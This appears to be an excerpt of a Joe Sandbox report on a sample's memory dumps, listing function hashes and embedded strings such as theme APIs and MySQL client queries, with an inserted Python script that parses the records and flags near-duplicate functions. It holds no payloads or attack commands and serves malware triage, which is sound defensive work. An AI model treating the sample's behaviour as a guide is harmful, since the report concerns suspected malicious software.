                                                                        • Opcode Fuzzy Hash: 71f79e8fd14864fee11d3caa4384dd8dbb33b3a3e7beff81a1179f76641447c9
                                                                        • Instruction Fuzzy Hash: 313109B5505204BBDF10DFA8DD89F9A37ECEB19364F148245BD68CB3A1D334E9808B60

                                                                        Control-flow Graph (basic blocks and edges; rendered graph not reproduced): 277 a6d0a0-a6d0af 278 a6d0b7-a6d0ce 277->278 279 a6d0b1 277->279 282 a6d0d0-a6d0f4 278->282 283 a6d11d-a6d122 278->283 279->278 285 a6d0fc-a6d113 282->285
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000A6B000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A6B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_a6b000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 994f853df20dc4413d90aa138fb5e77650c0565ae5df93b1f487cef362ebf594
                                                                        • Instruction ID: 17c69aa3bd7b9dfc68ce1b874ad95e664fb1379a8ea82c22c771a57db00ccfb2
                                                                        • Opcode Fuzzy Hash: 994f853df20dc4413d90aa138fb5e77650c0565ae5df93b1f487cef362ebf594
                                                                        • Instruction Fuzzy Hash: 9201F271B043046FE711DF69ED82E2AB7ADEBCA768B118079F50487342DAB29C019621

                                                                        Control-flow Graph (basic blocks and edges; rendered graph not reproduced): 288 a6e832-a6e878 291 a6e87f-a6e895 call a6e7a8 288->291 292 a6e87a call a6e69c 288->292 295 a6e89a-a6e8a2 291->295 292->291 296 a6e8a4 295->296 297 a6e8ac-a6e8b0 295->297 296->297 298 a6e8b7-a6e8c8 297->298 299 a6e8b2 call a6e700 297->299 302 a6e8cf 298->302 303 a6e8ca call a6e738 298->303 299->298 303->302
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000A6B000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A6B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_a6b000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 67bb3e179648ee2f2a69155600178ec3b8de4f98b325eb2d714e5bfa4979bcb0
                                                                        • Instruction ID: 2d26de94c3c8e2dcb13c024be4af897776675a773180aa3c5323ca475934a694
                                                                        • Opcode Fuzzy Hash: 67bb3e179648ee2f2a69155600178ec3b8de4f98b325eb2d714e5bfa4979bcb0
                                                                        • Instruction Fuzzy Hash: 5C11C278A04288BFEB56EFA8C9057ACBBF2EF8A700F5484E5F400932A1E7355D91C715
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000A6B000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A6B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_a6b000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4ec93d004c0bdd0a4bafae682d6d39801018b28d503589a0578079de52fe586f
                                                                        • Instruction ID: c7974e6b99d84052f85ff70bca4fd8e00214fe2dd524ad78c8f0a2442bfb07d3
                                                                        • Opcode Fuzzy Hash: 4ec93d004c0bdd0a4bafae682d6d39801018b28d503589a0578079de52fe586f
                                                                        • Instruction Fuzzy Hash: E311C278A04288BFEB56EFA8C9057ACBBF2EF8A700F5484E5F400532A1D7355D91C715
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000A6B000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A6B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_a6b000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b489a784eb852fb59491b8817a15f788ba4ca94506ff78918a3bbf7e03d24435
                                                                        • Instruction ID: db3dc5f62c8a1144f65f0713f91b8b86b3625e8488bc4b994b5ca2d22a79e4d2
                                                                        • Opcode Fuzzy Hash: b489a784eb852fb59491b8817a15f788ba4ca94506ff78918a3bbf7e03d24435
                                                                        • Instruction Fuzzy Hash: A101D635B04504BFDB01EBA8D996F8EB7F8EB88700B524465F404D7241DB30BE008BE5
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4454509843.0000000000FB6000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB6000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_fb6000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: db54f60663909a7436dcb1689bce7713d291c1ecd9984074643c8691f0b7a543
                                                                        • Instruction ID: a3499573c61ca0fd9fd247c2186e851d92e3367ac59f47b558fbfc36b3613784
                                                                        • Opcode Fuzzy Hash: db54f60663909a7436dcb1689bce7713d291c1ecd9984074643c8691f0b7a543
                                                                        • Instruction Fuzzy Hash: 62B012A47280114F2F46B03B0A1F43E700387D0705F1CE0333489D3585CC33870A3016
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4442189161.0000000000CBB000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CBB000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_cbb000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: )
                                                                        • API String ID: 0-2427484129
                                                                        • Opcode ID: ff16145018a6c5c5632cbc8a9c6fbfd71ff9ca2a68396d3093393da52bb077db
                                                                        • Instruction ID: d9afb96079c0c8970aae5b06fb0b8d9580a6304b8df3a32166fba65609cf4486
                                                                        • Opcode Fuzzy Hash: ff16145018a6c5c5632cbc8a9c6fbfd71ff9ca2a68396d3093393da52bb077db
                                                                        • Instruction Fuzzy Hash: 4221043240C3918FC708EB28E4542AEFBF0FBC1341F648A7FA4D986995D73485568F42
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundExtent$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                        • API String ID: 0-1748089680
                                                                        • Opcode ID: ac01c050939b278589bc25dd577f09dc5527cc22c560df6669efe227b43530a1
                                                                        • Instruction ID: d06bce1e430a02fe5cdf01346285dc321a66605ba30e2ffaa2988ff630ec434c
                                                                        • Opcode Fuzzy Hash: ac01c050939b278589bc25dd577f09dc5527cc22c560df6669efe227b43530a1
                                                                        • Instruction Fuzzy Hash: 34A18FB0A41791AFEF40DFB4D98AF6DB7E8EB46705780C5AAB400CF265DA749901CF12
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CharacterSet$armscii8$ascii$big5$binary$cp1250$cp1251$cp1256$cp1257$cp850$cp852$cp866$dec8$euckr$gb2312$gbk$greek$hebrew$hp8$keybcs2$koi8r$koi8u$latin1$latin2$latin5$latin7$macce$macroman$sjis$swe7$tis620$ujis$utf8
                                                                        • API String ID: 0-896016262
                                                                        • Opcode ID: 4f08829629abb2c27e2582e20978b8c087ff24e4009684dfe00c6898c7568480
                                                                        • Instruction ID: aa52ac7e4c2de3baf70ba02e938c083b637a9b8a8e6054cd584f76a3a1e97681
                                                                        • Opcode Fuzzy Hash: 4f08829629abb2c27e2582e20978b8c087ff24e4009684dfe00c6898c7568480
                                                                        • Instruction Fuzzy Hash: 6691622070C28597DB90DB6ECA81BAE23E9DB9B344F7448F1D891DBF56D635CE01AB40
                                                                        Strings
                                                                        • SELECT CAST(NULL AS UNSIGNED) AS RECNO, ROUTINE_SCHEMA AS CATALOG_NAME, CAST(NULL AS CHAR(64)) AS SCHEMA_NAME, CAST(NULL AS CHAR(6, xrefs: 00B9F676
                                                                        • END AS PROC_SCOPE, , xrefs: 00B9F70E
                                                                        • END AS PROC_TYPE, , xrefs: 00B9F69D
                                                                        • WHEN 'PROCEDURE' THEN , xrefs: 00B9F68B
                                                                        • ORDER BY 3, 5, xrefs: 00B9F781
                                                                        • ' THEN , xrefs: 00B9F6E7
                                                                        • ROUTINE_NAME LIKE ', xrefs: 00B9F75B
                                                                        • WHEN ', xrefs: 00B9F6D1
                                                                        • LOWER(ROUTINE_SCHEMA) = LOWER(', xrefs: 00B9F731
                                                                        • WHEN 'information_schema' THEN , xrefs: 00B9F6BC
                                                                        • ELSE , xrefs: 00B9F6F9
                                                                        • WHEN 'mysql' THEN , xrefs: 00B9F6A7
                                                                        • CAST(NULL AS UNSIGNED) AS IN_PARAMS, CAST(NULL AS UNSIGNED) AS OUT_PARAMS , xrefs: 00B9F713
                                                                        • FROM INFORMATION_SCHEMA.ROUTINES, xrefs: 00B9F718
                                                                        • CASE LOWER(ROUTINE_SCHEMA) , xrefs: 00B9F6A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ELSE $ END AS PROC_SCOPE, $ END AS PROC_TYPE, $ ORDER BY 3, 5$ WHEN '$ WHEN 'PROCEDURE' THEN $ WHEN 'information_schema' THEN $' THEN $CASE LOWER(ROUTINE_SCHEMA) $CAST(NULL AS UNSIGNED) AS IN_PARAMS, CAST(NULL AS UNSIGNED) AS OUT_PARAMS $FROM INFORMATION_SCHEMA.ROUTINES$LOWER(ROUTINE_SCHEMA) = LOWER('$ROUTINE_NAME LIKE '$SELECT CAST(NULL AS UNSIGNED) AS RECNO, ROUTINE_SCHEMA AS CATALOG_NAME, CAST(NULL AS CHAR(64)) AS SCHEMA_NAME, CAST(NULL AS CHAR(6$WHEN 'mysql' THEN
                                                                        • API String ID: 0-2325421409
                                                                        • Opcode ID: 6dab2bc6d5da6a73ad59640e9d8f5abe8ca428b882acabc0a6647cb9a43284be
                                                                        • Instruction ID: c80899466e4d97d84ac84077cfde5478a3621735d6585cb0a7916417ce0ed278
                                                                        • Opcode Fuzzy Hash: 6dab2bc6d5da6a73ad59640e9d8f5abe8ca428b882acabc0a6647cb9a43284be
                                                                        • Instruction Fuzzy Hash: 0E310C34A4020AAFDF01EBD4D886FADBBF1EF49724F6084B5F400E76A2D6759E41CA51
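The Similarity records above all share one shape: a "Memory Dump Source" block with "• Key: value" bullets, a String ID whose entries are separated by "$", and, for some functions, a preceding Strings block whose lines end in ", xrefs: <address>". When triaging a dropped sample like this one, an analyst usually wants two things from that data: which dumped region carries which embedded strings (here, the uxtheme.dll imports and the MySQL client SQL all sit in the 00B9D000 region), and which functions are near-identical copies of each other. The Python below is an added example for this report, not Joe Sandbox code. It parses an abridged sample transcribed from this listing (String ID lists shortened, section labels trimmed), groups strings by dump offset, finds the region containing the INFORMATION_SCHEMA query, and flags record pairs whose Instruction Fuzzy Hashes differ in only a few hex digits. Comparing the fuzzy hash position by position is an assumption made for illustration, not Joe Sandbox's documented similarity method.

```python
"""Parse Joe Sandbox 'Similarity' records and pivot on them (added example)."""
import re
from collections import defaultdict

# Constructed sample: four records transcribed from this report's listing, with
# the String ID lists shortened and the 'Similarity' / plugin labels trimmed.
SAMPLE = """\
Memory Dump Source
• Source File: 00000005.00000002.4181918340.0000000000A6B000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A6B000, based on PE: false
• String ID:
• Opcode ID: 67bb3e179648ee2f2a69155600178ec3b8de4f98b325eb2d714e5bfa4979bcb0
• Instruction Fuzzy Hash: 5C11C278A04288BFEB56EFA8C9057ACBBF2EF8A700F5484E5F400932A1E7355D91C715
Memory Dump Source
• Source File: 00000005.00000002.4181918340.0000000000A6B000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A6B000, based on PE: false
• String ID:
• Opcode ID: 4ec93d004c0bdd0a4bafae682d6d39801018b28d503589a0578079de52fe586f
• Instruction Fuzzy Hash: E311C278A04288BFEB56EFA8C9057ACBBF2EF8A700F5484E5F400532A1D7355D91C715
Memory Dump Source
• Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
• String ID: CloseThemeData$OpenThemeData$SetWindowTheme$uxtheme.dll
• Opcode ID: ac01c050939b278589bc25dd577f09dc5527cc22c560df6669efe227b43530a1
• Instruction Fuzzy Hash: 34A18FB0A41791AFEF40DFB4D98AF6DB7E8EB46705780C5AAB400CF265DA749901CF12
Strings
• FROM INFORMATION_SCHEMA.ROUTINES, xrefs: 00B9F718
Memory Dump Source
• Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
• String ID: CASE LOWER(ROUTINE_SCHEMA) $FROM INFORMATION_SCHEMA.ROUTINES$ROUTINE_NAME LIKE '$WHEN 'mysql' THEN
• Opcode ID: 6dab2bc6d5da6a73ad59640e9d8f5abe8ca428b882acabc0a6647cb9a43284be
• Instruction Fuzzy Hash: 0E310C34A4020AAFDF01EBD4D886FADBBF1EF49724F6084B5F400E76A2D6759E41CA51
"""

BULLET = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")
XREF = re.compile(r"^•\s*(?P<text>.*), xrefs: (?P<addr>[0-9A-Fa-f]+)$")
OFFSET = re.compile(r"Offset: (?P<off>[0-9A-Fa-f]+)")


def parse_records(text):
    """One dict per 'Memory Dump Source' block: its '• Key: value' bullets plus
    'offset', 'strings' (String ID split on '$', empty when blank) and 'xrefs'
    (the Strings block that precedes the record, as (text, address) pairs)."""
    records, current, pending = [], None, []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {"xrefs": pending, "strings": [], "offset": None}
            pending = []
            records.append(current)
            continue
        m = XREF.match(line)
        if m:  # Strings block lines belong to the record that follows them
            pending.append((m.group("text"), m.group("addr").upper()))
            continue
        m = BULLET.match(line)
        if not m or current is None:
            continue  # section labels such as 'Similarity' or 'Strings'
        key, val = m.group("key").strip(), m.group("val").strip()
        current[key] = val
        if key == "Source File":
            off = OFFSET.search(val)
            current["offset"] = off.group("off").upper() if off else None
        elif key == "String ID":
            current["strings"] = val.split("$") if val else []
    return records


def strings_by_region(records):
    """Dump offset -> sorted unique strings, to see which region carries what."""
    out = defaultdict(set)
    for r in records:
        out[r["offset"]].update(r["strings"])
    return {k: sorted(v) for k, v in out.items()}


def regions_with(records, needle):
    """Offsets of regions whose String ID or xref strings contain needle."""
    return {r["offset"] for r in records
            if any(needle in t for t in r["strings"] + [x for x, _ in r["xrefs"]])}


def fuzzy_distance(a, b):
    """Differing hex digits between two equal-length fuzzy hashes.
    Assumption: position-wise comparison is a usable closeness measure."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes must have equal length")
    return sum(x != y for x, y in zip(a.upper(), b.upper()))


def near_duplicates(records, max_dist=4):
    """(Opcode ID, Opcode ID, distance) for pairs whose Instruction Fuzzy
    Hashes differ in at most max_dist digits; unequal lengths are skipped."""
    pairs = []
    for i, r1 in enumerate(records):
        for r2 in records[i + 1:]:
            h1, h2 = r1.get("Instruction Fuzzy Hash"), r2.get("Instruction Fuzzy Hash")
            if not h1 or not h2 or len(h1) != len(h2):
                continue
            d = fuzzy_distance(h1, h2)
            if d <= max_dist:
                pairs.append((r1["Opcode ID"], r2["Opcode ID"], d))
    return pairs


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for off, strs in strings_by_region(recs).items():
        print(off, len(strs), "strings")
    print("region with the MySQL client code:", regions_with(recs, "INFORMATION_SCHEMA"))
    print("near-duplicate functions:", near_duplicates(recs))
```

On the sample the two 00A6B000 functions (Opcode IDs 67bb3e17... and 4ec93d00...) come out four hex digits apart, while every other pair differs in far more, so a threshold of three or four separates copy-like functions from unrelated ones here; with a full report, lower the threshold first and widen it only while the pairs it returns still look like genuine duplicates under IDA.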
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: = ?$ AS $ AS RESULT$ AS RESULT, $) AS $CALL $CAST($DATE$DATETIME$DECIMAL$SELECT $SET $SIGNED$TIME
                                                                        • API String ID: 0-1103529402
                                                                        • Opcode ID: 031d01c3b9a4ed472b426979c7db7fddbd58292bdd788a338cf96dda24ce29c8
                                                                        • Instruction ID: c6a3747de4411bf2f13aa903e2e4ab725816014ceed3a9845ecdfd9a917b52a5
                                                                        • Opcode Fuzzy Hash: 031d01c3b9a4ed472b426979c7db7fddbd58292bdd788a338cf96dda24ce29c8
                                                                        • Instruction Fuzzy Hash: 86E1F835A0020D9FDF11EB94C886BEEB7F5EF88304F5080B6E461A7266D774EA45CB52
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CharacterSet$LoginTimeout$MySQL$NewPassword$Phys$ReadTimeout$SET PASSWORD = PASSWORD("$SET SQL_AUTO_IS_NULL = 0$SHOW VARIABLES LIKE 'lower_case_table_names'$WriteTimeout
                                                                        • API String ID: 0-1371362503
                                                                        • Opcode ID: bd03c08c49cb8b0884976c76826070870d2fd41e66e2ca5df20e96216e2113a1
                                                                        • Instruction ID: 932824fdeeeee0d3a201667d935819dcec82396e366922c63cdf191978fc9292
                                                                        • Opcode Fuzzy Hash: bd03c08c49cb8b0884976c76826070870d2fd41e66e2ca5df20e96216e2113a1
                                                                        • Instruction Fuzzy Hash: F3020534A08248DFDB04DBA8C985B9DB7F5FF8A300F6045F5E405AB266CBB4AE45DB50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Characterset name$Client info$Client version$DLL$Host info$Name modes$SSL Cipher$Server info
                                                                        • API String ID: 0-206376862
                                                                        • Opcode ID: 8e735c7f03072afa705ec3e33536aefc20438d21c4e0ef7a169531525a56b97a
                                                                        • Instruction ID: 1135bdc0a204cc9fd9efd2afe3332911bab1d48ab6a6151f879fcd79434f5707
                                                                        • Opcode Fuzzy Hash: 8e735c7f03072afa705ec3e33536aefc20438d21c4e0ef7a169531525a56b97a
                                                                        • Instruction Fuzzy Hash: EB71F774A04608DFCB20EF58C481B9DB7F1FF8A310F6181A5E954AB316D730EE458BA6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: * 7$, INTERVAL $DATE_ADD($DAY$FRAC_SECOND$MICROSECOND$WEEK
                                                                        • API String ID: 0-521714938
                                                                        • Opcode ID: 1c3051a74d507251c0467e0cbb94195591bc0e41f1b14f0acc843e9a5b1dcc25
                                                                        • Instruction ID: 45f7daaf5970e44a5b2b63cdbdafbb6aeadfbd7b5d3aa85ef3cffd3205b7620f
                                                                        • Opcode Fuzzy Hash: 1c3051a74d507251c0467e0cbb94195591bc0e41f1b14f0acc843e9a5b1dcc25
                                                                        • Instruction Fuzzy Hash: 07410534A0011E9FCF00EB95C886E9EB7F2FF98310F6085B5E415AB269D670ED46CB52
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BEGIN$CALL$EXPLAIN$REPLACE$SHOW$START$TRANSACTION
                                                                        • API String ID: 0-931911286
                                                                        • Opcode ID: 6a8e0b554fa95ae4b62dfe58099b02627dca82cea59a1b7c06a8ba0a088330e6
                                                                        • Instruction ID: f1c56bda187078ed1ce1d888648dfb87329949496c6244411d96fed0a0528b61
                                                                        • Opcode Fuzzy Hash: 6a8e0b554fa95ae4b62dfe58099b02627dca82cea59a1b7c06a8ba0a088330e6
                                                                        • Instruction Fuzzy Hash: 6D319130B04104ABEF10EA65D585B5DBBE2EB9D314F6140F4F825AB742E934EE01D723
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: bmp$emf$ico$tif$tiff$wmf
                                                                        • API String ID: 0-1495982834
                                                                        • Opcode ID: 8eae2caa70834cda04bab118bb87b94294f967b2e82a37fcabe31cb76ca2368c
                                                                        • Instruction ID: 7fb4cc19f6d21a79145fe7780e7d00719acc4f675311d85b9b5ef5a801add29f
                                                                        • Opcode Fuzzy Hash: 8eae2caa70834cda04bab118bb87b94294f967b2e82a37fcabe31cb76ca2368c
                                                                        • Instruction Fuzzy Hash: FC314A71B00604ABD705EB98DC96FEF73B6EB98700F1041A4F5119B3A2DAF4AE01C7A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: READ COMMITTED$READ UNCOMMITTED$REPEATABLE READ$SERIALIZABLE$SET AUTOCOMMIT = $SET SESSION TRANSACTION ISOLATION LEVEL
                                                                        • API String ID: 0-3294501522
                                                                        • Opcode ID: be554aff4b484e9e3442777c44fcecee670154aeee8a637db720b4c6064facc1
                                                                        • Instruction ID: c1184a83b4732da54b65cd83bbbbe05e83b7e783220e8ca719eeafca2b0612ec
                                                                        • Opcode Fuzzy Hash: be554aff4b484e9e3442777c44fcecee670154aeee8a637db720b4c6064facc1
                                                                        • Instruction Fuzzy Hash: 5F21B6B5A08A08DFDB14EB64C486B5E73E9EF8A301B5084F9E80197756DE34EF448A12
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FOR UPDATE$FROM $LOCK IN SHARE MODE$SELECT $WHERE
                                                                        • API String ID: 0-2571452000
                                                                        • Opcode ID: a4c76fbbeea6f9eac54ca627d4999119c966dbdf9ea923ecd20f7a03361c420b
                                                                        • Instruction ID: 133491007b1d372549817692d475f2393a20a3c614df77aa27d087741f9c1fdd
                                                                        • Opcode Fuzzy Hash: a4c76fbbeea6f9eac54ca627d4999119c966dbdf9ea923ecd20f7a03361c420b
                                                                        • Instruction Fuzzy Hash: FC215071B10209ABEF05EBA4CC82E9EB7E9EB48704F4084B5F511A7352EA79D9058761
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ELSE $ END$ THEN $ WHEN $CASE
                                                                        • API String ID: 0-4005974953
                                                                        • Opcode ID: bd2533e76e5fba2a69b5051497d7a937bf4c570b93a99a90b58b1d7fb2549a58
                                                                        • Instruction ID: 8d78eff98ab1a03b107bf5131f3c2027c63d23749648d3819e7d547d489f0f5e
                                                                        • Opcode Fuzzy Hash: bd2533e76e5fba2a69b5051497d7a937bf4c570b93a99a90b58b1d7fb2549a58
                                                                        • Instruction Fuzzy Hash: A921B375B041189FDF10EBA9C486F49BBE5EB89320F5680B9F945EB362D630EC419B12
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: IN $ LIKE '$FULL $SHOW $TABLES
                                                                        • API String ID: 0-4237437289
                                                                        • Opcode ID: 85a77a033eef97421121c6d89cef06f19c11179937b7918ed4c654ebf4f32f43
                                                                        • Instruction ID: 06cb5c48012193aa519672547c3a742787ba347224cb30499f82fed404ab07e5
                                                                        • Opcode Fuzzy Hash: 85a77a033eef97421121c6d89cef06f19c11179937b7918ed4c654ebf4f32f43
                                                                        • Instruction Fuzzy Hash: 2D11D33560020AEBDF00DF94C486BAE7BE1EB88364F6080B5F844CB761C634DE81DB92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: INOUT$OUT$RETURNS$result
                                                                        • API String ID: 0-466229303
                                                                        • Opcode ID: 07c8c78b3bed52dff4a5868960543b8777414965d1671068ea3ff0a8dc37f7eb
                                                                        • Instruction ID: 9a0328f76881c0093e8ac9e6d5570e49e8c3b6ebe30a18ed7f4ba5b615d659c9
                                                                        • Opcode Fuzzy Hash: 07c8c78b3bed52dff4a5868960543b8777414965d1671068ea3ff0a8dc37f7eb
                                                                        • Instruction Fuzzy Hash: E3D17334B041198BDB10EB64C891BEEB7F5DF89300F10C5BAE995A7386DB349E46CB61
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Choose$ResultMode$Store$Use
                                                                        • API String ID: 0-921899505
                                                                        • Opcode ID: 7ee6cbca850c4e4e67fbf9c8b85682d11b2ad0e253d8b30fe65367767354fb49
                                                                        • Instruction ID: 2216deb5150e074a7cc820082f6b94f792c85ec684b3c78996b2ce8e4f0b9178
                                                                        • Opcode Fuzzy Hash: 7ee6cbca850c4e4e67fbf9c8b85682d11b2ad0e253d8b30fe65367767354fb49
                                                                        • Instruction Fuzzy Hash: DA01843530C3459BD741DFA9DC81B5D73EAEB8A700F6048F0EA00E7756E630DE009640
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ELSE $ END$ THEN $CASE WHEN
                                                                        • API String ID: 0-101266264
